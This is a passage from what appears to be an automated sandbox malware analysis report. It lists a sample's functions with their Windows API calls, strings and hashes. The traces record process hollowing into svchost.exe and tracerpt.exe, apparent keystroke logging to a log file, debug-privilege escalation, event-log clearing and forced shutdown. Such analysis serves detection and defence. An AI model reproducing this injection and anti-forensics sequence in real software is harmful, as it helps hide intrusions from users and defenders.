                                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03777AA1
                                                                                                                                                                      • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03777ABA
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03777AD6
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03777AE8
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03777AF1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                                                                      • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                      • API String ID: 4176418925-3213446972
                                                                                                                                                                      • Opcode ID: 4756b0fe8681ed3a50a72abed34e295318cae03e67ac277a0055c913cc5cb14a
                                                                                                                                                                      • Instruction ID: e111df92c22b43e5ff0c68603d07c408e2f786eb1367564d4cca560c9ede4468
                                                                                                                                                                      • Opcode Fuzzy Hash: 4756b0fe8681ed3a50a72abed34e295318cae03e67ac277a0055c913cc5cb14a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2681E8B1A8031C7BEB21EB65DC49FEF777CEF85B00F004599F208A6181DAB49A45CB64
                                                                                                                                                                      Function 02C65820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65849
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65868
                                                                                                                                                                      • _memset.LIBCMT ref: 02C6589D
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02C658B1
                                                                                                                                                                        • Part of subcall function 02C659E0: _vswprintf_s.LIBCMT ref: 02C659F1
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 02C658E0
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02C65928
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C6594E
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C65968
                                                                                                                                                                      • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C65987
                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C659A2
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C659C1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                      • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                                                                      • API String ID: 2170139861-1986163084
                                                                                                                                                                      • Opcode ID: d8fec2186ea0cd2f9fa27c1a1123dfa36a08ffbab6ba22837b3f81e096cbd59c
                                                                                                                                                                      • Instruction ID: 0a5408ece8d19b486b318abe55fb7c41acfa4da5fa6fa183c3b8c1efb9465b06
                                                                                                                                                                      • Opcode Fuzzy Hash: d8fec2186ea0cd2f9fa27c1a1123dfa36a08ffbab6ba22837b3f81e096cbd59c
                                                                                                                                                                      • Instruction Fuzzy Hash: C44148B0A40308ABE724DF70DC85FBA77B8AF54744F50459DB64DA7180DBB49A84CF94
                                                                                                                                                                      Function 03777E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 03777E73
                                                                                                                                                                      • _memset.LIBCMT ref: 03777E9F
                                                                                                                                                                      • _memset.LIBCMT ref: 03777ED4
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03777EE8
                                                                                                                                                                        • Part of subcall function 03778720: _vswprintf_s.LIBCMT ref: 03778731
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 03777F15
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03777F65
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03777F92
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03777FAA
                                                                                                                                                                      • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03777FCC
                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03777FEA
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03777FFF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                      • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                      • API String ID: 2170139861-2473635271
                                                                                                                                                                      • Opcode ID: 345d524ca02219e4fb13b8db78d2737525f609733b25cb1ba2fbba2d9bb40dc6
                                                                                                                                                                      • Instruction ID: 9c1a96a455a2b724898cfd8b623b2c038cf25ec79fc42b11cf00b67c3cfbed12
                                                                                                                                                                      • Opcode Fuzzy Hash: 345d524ca02219e4fb13b8db78d2737525f609733b25cb1ba2fbba2d9bb40dc6
                                                                                                                                                                      • Instruction Fuzzy Hash: A241C8B5A4035CBBDB24EB64DC85FEE77BCAB44B00F0082D9E20DA6181DAB45B85CF54
                                                                                                                                                                      Function 0377E4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,037A0D80,74DEE010,74DF2FA0,74DF0F00,?,03776028,?,?), ref: 0377E519
                                                                                                                                                                      • lstrcatW.KERNEL32(037A0D80,\DisplaySessionContainers.log,?,03776028,?,?), ref: 0377E529
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,037A0D80,?,03776028,?,?), ref: 0377E538
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03776028,?,?), ref: 0377E546
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03776028,?,?), ref: 0377E563
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,03776028,?,?), ref: 0377E56E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,03776028,?,?), ref: 0377E577
                                                                                                                                                                      • DeleteFileW.KERNEL32(037A0D80,?,03776028,?,?), ref: 0377E58A
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000,?,03776028,?,?), ref: 0377E597
                                                                                                                                                                      • DirectInput8Create.DINPUT8(?,00000800,03794934,037A1220,00000000,?,03776028,?,?), ref: 0377E5B2
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377E665
                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0377E672
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                                                                      • String ID: <$\DisplaySessionContainers.log
                                                                                                                                                                      • API String ID: 1095970075-1170057892
                                                                                                                                                                      • Opcode ID: 5ce9b3654d909e51b552e2f7bd71ad82c8793d322eaf8e52790d3112acca264e
                                                                                                                                                                      • Instruction ID: 3f927e952daef7dd5de9b4cf7cc536a48caf00b02467c7fd54ae37b52e724882
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ce9b3654d909e51b552e2f7bd71ad82c8793d322eaf8e52790d3112acca264e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9441C375740309BFEB10EFA8EC45F9E3BA4AB88700F508689F615DB2C5D675E402CB94
                                                                                                                                                                      Function 03777620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0377DFA4), ref: 03777637
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0377DFA4), ref: 0377763E
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0377765A
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777677
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777681
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0377DFA4), ref: 03777691
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777698
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 037776BA
                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 037776C7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                                                                      • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                                                                      • API String ID: 1802016953-1577477132
                                                                                                                                                                      • Opcode ID: 4b4bb1237e60a10bca0351e7d25e5ced5cdbd4902059446ba4c4cc91eff7e106
                                                                                                                                                                      • Instruction ID: 359546ba681c32bcd4b26e712feeb7a3bd952dcd645f0023c230d99c9ac163fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b4bb1237e60a10bca0351e7d25e5ced5cdbd4902059446ba4c4cc91eff7e106
                                                                                                                                                                      • Instruction Fuzzy Hash: 37216371A4030CBFEB10FBE4DC0AFBE7778EB08710F01460AF605AA185DAB45545CBA5
                                                                                                                                                                      Function 0378054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03780576
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 0378058E
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0378059E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 037805AE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03780600
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03780615
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                                                                      • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                                                                      • API String ID: 3290314748-423161677
                                                                                                                                                                      • Opcode ID: 51867ca4102c3d9f119be2e074e1acebeb604a48ca6bdb4a1f8113825cbdf448
                                                                                                                                                                      • Instruction ID: 33dcca44b2fad796877d3cdb32248f9b7fb130341e85e820d3ce04d93ea1402d
                                                                                                                                                                      • Opcode Fuzzy Hash: 51867ca4102c3d9f119be2e074e1acebeb604a48ca6bdb4a1f8113825cbdf448
                                                                                                                                                                      • Instruction Fuzzy Hash: 9731C372E8121DBBDB10FFA4DC84AEEB7B8EF44755F144516E511E7040DB74AA08CBA1
                                                                                                                                                                      Function 03777B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 3435690185-3733053543
                                                                                                                                                                      • Opcode ID: 0b3c67100f572e17496aac71cc753b22a56e6a4fe387c3c2e3844ba6022065a7
                                                                                                                                                                      • Instruction ID: 869fc932c71bf55be07a073d24a188f96173105bd556e08dd6abe68d0276c049
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b3c67100f572e17496aac71cc753b22a56e6a4fe387c3c2e3844ba6022065a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 27117B71B4021CABDB14FFB4DC49FAE7778EB08700F41865AF9059B185DA759905CBA0
                                                                                                                                                                      Function 0377B3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenEventLogW.ADVAPI32(00000000,037958BC), ref: 0377B3E7
                                                                                                                                                                      • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0377B3F2
                                                                                                                                                                      • CloseEventLog.ADVAPI32(00000000), ref: 0377B3F9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$ClearCloseOpen
                                                                                                                                                                      • String ID: Application$Security$System
                                                                                                                                                                      • API String ID: 1391105993-2169399579
                                                                                                                                                                      • Opcode ID: 4b12d649ba2b6c6ab3904564bba8ec59c2186fa5daf85e05a392715f97b43ebe
                                                                                                                                                                      • Instruction ID: 3179c9bdd96509358329e5cc585b51c42fc4a1683edf369eabcf5e7027a2e131
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b12d649ba2b6c6ab3904564bba8ec59c2186fa5daf85e05a392715f97b43ebe
                                                                                                                                                                      • Instruction Fuzzy Hash: 74E0E53260622C5BE612EB09B848B1EF3E0FBCD315F05475BE94856104C63084469B95
                                                                                                                                                                      Function 035F660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf$_memset
                                                                                                                                                                      • String ID: :$@
                                                                                                                                                                      • API String ID: 1292703666-1367939426
                                                                                                                                                                      • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                                                                      • Instruction ID: 191227b890a4e21afe0a0be3101a489193a5a09cd9d6cd54614a6fa69d25d319
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                                                                      • Instruction Fuzzy Hash: FC3152B6D4021CABDB14DFE5DC85FEEB7B9FB88300F50421DEA0AA7241E6745905CB94
                                                                                                                                                                      Function 03777740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037778FC), ref: 03777756
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037778FC,?,?,?,?,?,?,74DF0630), ref: 0377775D
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03777785
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 037777B9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                      • API String ID: 2349140579-2896544425
                                                                                                                                                                      • Opcode ID: 6477baa8e0fcb087a007d2a8ee19d49934a37f530f875f4bae4aa175567bd3b6
                                                                                                                                                                      • Instruction ID: 43331c9968169ec201a4a77b3f0a45aa4064ec3f7a57c500db358aec11f6d17b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6477baa8e0fcb087a007d2a8ee19d49934a37f530f875f4bae4aa175567bd3b6
                                                                                                                                                                      • Instruction Fuzzy Hash: F4116571A4020CABDF04EFE5DD4ABFEB7B4EB08704F108659E505AB280DA759505CBA0
                                                                                                                                                                      Function 0377F00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0378131C
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03781331
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(037925B8), ref: 0378133C
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 03781358
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0378135F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                      • Opcode ID: eb7c6e97952e4882324e4b918941a4d0e93abeabce8073ead3df35bd67e6caf2
                                                                                                                                                                      • Instruction ID: 462aef5f7a76643c8ca0dda76d22e9ad18ad01880cd1d24a737e25e1b4282d5d
                                                                                                                                                                      • Opcode Fuzzy Hash: eb7c6e97952e4882324e4b918941a4d0e93abeabce8073ead3df35bd67e6caf2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F21D2B9544208EFD740FF28F5486483BE4BB0A302F50D65BE908D7389EB789992CF55
                                                                                                                                                                      Function 02C66815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 02C6793D
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C67952
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(02C75350), ref: 02C6795D
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 02C67979
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02C67980
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                      • Opcode ID: 3984b4f2e51b89c5271f630d2d2589b2d5325eb8cf6e481b5424169e2bac8a7c
                                                                                                                                                                      • Instruction ID: c776b6b898303152ee1b4863399ddf7539c4c56bba47b06513546d42f3c6aeca
                                                                                                                                                                      • Opcode Fuzzy Hash: 3984b4f2e51b89c5271f630d2d2589b2d5325eb8cf6e481b5424169e2bac8a7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 6021E0B4C84700EFE701DF69E58976C3BB5FB08385F401A19E90987350EBB659A9CF04
                                                                                                                                                                      Function 0377B463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03777B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                        • Part of subcall function 03777B70: OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                        • Part of subcall function 03777B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                        • Part of subcall function 03777B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                        • Part of subcall function 03777B70: GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • ExitWindowsEx.USER32(00000005,00000000), ref: 0377B471
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 681424410-0
                                                                                                                                                                      • Opcode ID: 004a03a467c768caecd9357314e5da3b3c737c1f2f64526d00044aa5778ef424
                                                                                                                                                                      • Instruction ID: 51500d0f831ddd6c0b0cb20eab1145330b86eeff14864771f289e20cb6ead66e
                                                                                                                                                                      • Opcode Fuzzy Hash: 004a03a467c768caecd9357314e5da3b3c737c1f2f64526d00044aa5778ef424
                                                                                                                                                                      • Instruction Fuzzy Hash: 20C08C3634024412D618B3B87C2EB7AB340DB88322F00452BE70A8C0D18C56849109E6
                                                                                                                                                                      Function 0377B43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03777B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                        • Part of subcall function 03777B70: OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                        • Part of subcall function 03777B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
